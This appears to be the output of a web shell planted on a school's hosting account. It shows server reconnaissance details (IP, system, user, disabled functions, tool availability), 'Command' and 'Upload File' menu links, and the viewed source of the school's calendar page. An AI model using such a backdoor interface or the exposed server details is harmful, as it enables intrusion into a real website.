|
Server IP : 145.79.58.44 / Your IP : 216.73.217.45 Web Server : LiteSpeed System : Linux in-mum2-web2213.main-hosting.eu 5.14.0-611.35.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Feb 25 03:46:09 EST 2026 x86_64 User : u882412079 ( 882412079) PHP Version : 8.3.30 Disable Function : system, exec, shell_exec, passthru, mysql_list_dbs, ini_alter, dl, symlink, link, chgrp, leak, popen, apache_child_terminate, virtual, mb_send_mail MySQL : OFF | cURL : ON | WGET : ON | Perl : OFF | Python : OFF Directory (0755) : /home/u882412079/domains/sonimodernpublicschool.com/public_html/bb-admin/../ |
| [ Home ] | [ C0mmand ] | [ Upload File ] |
|---|
<?php
include 'header.php';
?>
<div class="page-banner-area bg-2">
<div class="container">
<div class="page-banner-content">
<h1>School Calender</h1>
<ul>
<li><a href="index.php">Home</a></li>
<li>School Calender</li>
</ul>
</div>
</div>
</div>
<section class="sectionPadding pt-70 pb-70">
<div class="container">
<!-- <div class="row justify-content-center">
<div class="col-xl-12 col-lg-12">
<div class="section-title text-center">
<h6 class="sub-title double-line">Annual</h6>
<h2 class="title mt-3">School Calender 2024-2025 </h2>
</div>
</div>
</div> -->
</div>
<!-- <div class="more-campus text-center">
<p>Select From Hundreds of Options. <a href="campus-life.php" class="read-more-btn active">More on Campus Life <i class="flaticon-next"></i></a></p>
</div> -->
</div>
</div>
<div class="row">
<div class="col-md-12">
<div>
<iframe src="https://docs.google.com/spreadsheets/d/e/2PACX-1vTECNOgJT4SfKP9r5FL2zJLUc87cQGOeY4qixmvIpDfLLby71lmnxbNhiZpdsiIuU0ABCWiWe-zNuhq/pubhtml?gid=0&single=true&widget=true&headers=false" width="100%" height="900"></iframe>
</div>
</div>
</div>
</div>
</section>
<?php
include 'footer.php';
?>